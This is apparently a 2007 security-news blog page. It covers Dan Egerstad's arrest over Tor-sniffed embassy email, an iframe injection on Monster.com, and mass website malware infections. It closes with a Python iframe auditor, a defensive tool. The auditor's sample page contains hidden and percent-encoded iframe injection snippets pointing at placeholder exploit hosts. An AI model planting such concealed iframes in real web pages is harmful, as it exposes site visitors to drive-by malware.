Monday, 26 November 2007

Swedish cops catch and release embassy hacker Egerstad

There’s a really interesting story making the rounds today about the arrest of Dan Egerstad, a Swedish security consultant who claims to have compromised a private data network used by embassies around the world earlier this year. Swedish police apparently braced Egerstad outside his apartment yesterday, confiscated a bunch of his PCs and other hardware and dragged him in for two hours of questioning. In a story in the Sydney Morning Herald newspaper, Egerstad says that “the police ‘played every trick in the book, good cop, bad cop and crazy mysterious guy in the corner not wanting to tell his name and just staring at me. Well, if they want to try to manipulate, I can play that game too. [I] gave every known body signal there is telling of lies … covered my mouth, scratched my elbow, looked away and so on.’”

What’s really interesting about this is that even though Egerstad’s exploits were widely publicized and he went so far as to post on his web site account information for some of the unsecured email accounts he found, the police let him walk without even charging him. Egerstad has claimed all along that he didn’t break any laws and got the account information by installing Tor on a few servers and monitoring the traffic. But the Swedish police apparently weren’t buying that and felt they had enough evidence to impound his computers and subject him to several hours of questioning. It could have been a simple fishing expedition on their part, but Egerstad should probably count himself very lucky that he’s a Swede. Had he been living in Germany or the UK or even the U.S. when he pulled his stunt, he likely would still be sitting in an interrogation room drinking warm Fresca.

The other interesting note here is that Egerstad now says he thinks the people sending the messages from the email accounts he was monitoring were not the accounts’ owners, but hackers who had compromised them and were using Tor to hide their activities. I’m not sure that helps his case at all, but it’s a good indication that these embassies, NGOs and other organizations need to take a look around their networks and see what’s happening.



Monster.com hacked again

These continue to be risky times for those using Monster.com to search for jobs. You might remember that hackers targeted Monster.com with a massive phishing attack last August, stealing at least 1.6 million bank account records in the process. Now comes word that the bad guys nailed the site with an iframe injection attack Monday.

Roger Thompson, CTO at Exploit Prevention Labs, blogged that multiple brands appeared to be affected, including Eddie Bauer, GMAC Mortgage, BestBuy, Toyota Financial, and Tricounties Bank.

“It is … not clear how many pages were affected, but it is likely that the attack was the same for all companies on the Web site, which might turn out to be a pretty good set of Fortune 500 [companies],” he wrote, adding that his lab detected the attack as something cooked up using the Neosploit exploit package. “It is fairly well encrypted,” he said.

Fortunately, he said, Monster caught on quickly and yanked the affected pages down.



Websites Hosting Malware Increases to 66,000 & Still Rising

In November 2007, the number of Websites infected with malware climbed to a staggering 66,000 and continues to grow, even though most anti-virus solutions are capable of detecting the malicious programs. A major source of these infections has been the malicious yl18.net script, and the number of Websites the script has infected has doubled, says SANS Internet Storm Institute's Mark Hofman. Ars Technica reported this on November 12, 2007.

Hofman further believes the script is the same malware behind the Super Bowl-related infection of early 2007, which struck nearly 200,000 Websites. After some research, Hofman found that the February infection originated from several of the same servers that are operating this time too, including Zj5173.com and 137wg.com. The February malicious script used SQL injection to alter site contents and push visitors into downloading executable files. SANS has observed the same pattern of activity this time as well.

Two-stage attacks that plant concealed iframe code on a compromised Website and then send visitors on to malware-hosting sites, where their computers get infected, have become all too common. MPack, the malware development kit, often applies this technique. In April this year (2007), a security company reported that the Website of ASUS (the motherboard maker) carried iframe code on its pages that exploited a vulnerability in the way Microsoft Windows handles animated cursors to drop malware on victims' computers.

The iframe attack appears to have a connection with Chinese servers, according to the SANS Institute. These servers have frequently been used to launch attacks on government as well as consumer PCs. Not only small sites but large ones too have been hit by malware. Recently, the Indian news site IndiaTimes began serving malware to its visitors' computers, Mary Landesman, Security Researcher at ScanSafe, wrote on the firm's blog. Ars Technica reported this on November 12, 2007.

The choice of old vulnerabilities suggests the attacks may have been carried out with the Metasploit Framework; successful exploitation leads to massive malware downloads, Landesman added.
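Site owners can check their own pages for the concealed-iframe pattern behind both the Monster.com injection and the two-stage attacks described above. The following auditor is an added example, not code from this page or from any of the researchers it cites; the sample HTML, hostnames and site name are constructed.

```python
"""Flag iframes that are hidden (zero-size or CSS-hidden), point off-site,
or are assembled at runtime from percent-encoded JavaScript strings."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# document.write(unescape("%3Ciframe ...")) is a common way to hide the tag from grep
ENCODED_IFRAME = re.compile(r"%3C\s*iframe", re.I)


class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []          # list of (src_or_tag, [reasons])
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if a.get("width", "").strip("px ") in ("0", "1") or \
           a.get("height", "").strip("px ") in ("0", "1"):
            reasons.append("tiny-dimensions")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and not host.endswith(self.site_host):
            reasons.append("offsite-src:" + host)
        if reasons:
            self.findings.append((a.get("src", ""), reasons))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive as raw text; decode and look for a built iframe
        if self._in_script and ENCODED_IFRAME.search(data):
            decoded = unquote(data)
            m = re.search(r"<iframe[^>]*>", decoded, re.I)
            self.findings.append((m.group(0) if m else decoded.strip(),
                                  ["script-built-iframe"]))


def audit_html(html, site_host):
    parser = IframeAuditor(site_host)
    parser.feed(html)
    return parser.findings


# Constructed page: one legitimate frame, one hidden off-site frame,
# one frame written by obfuscated script (hostnames are placeholders).
SAMPLE = """<html><body><h1>Job listings</h1>
<iframe src="/widgets/search" width="600" height="400"></iframe>
<iframe src="http://malware-host.example/in.cgi?3" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Ciframe src=%22http://exploit-kit.example/%22 width=1 height=1%3E%3C/iframe%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_html(SAMPLE, "jobs.example"):
        print(", ".join(reasons), "->", src)
```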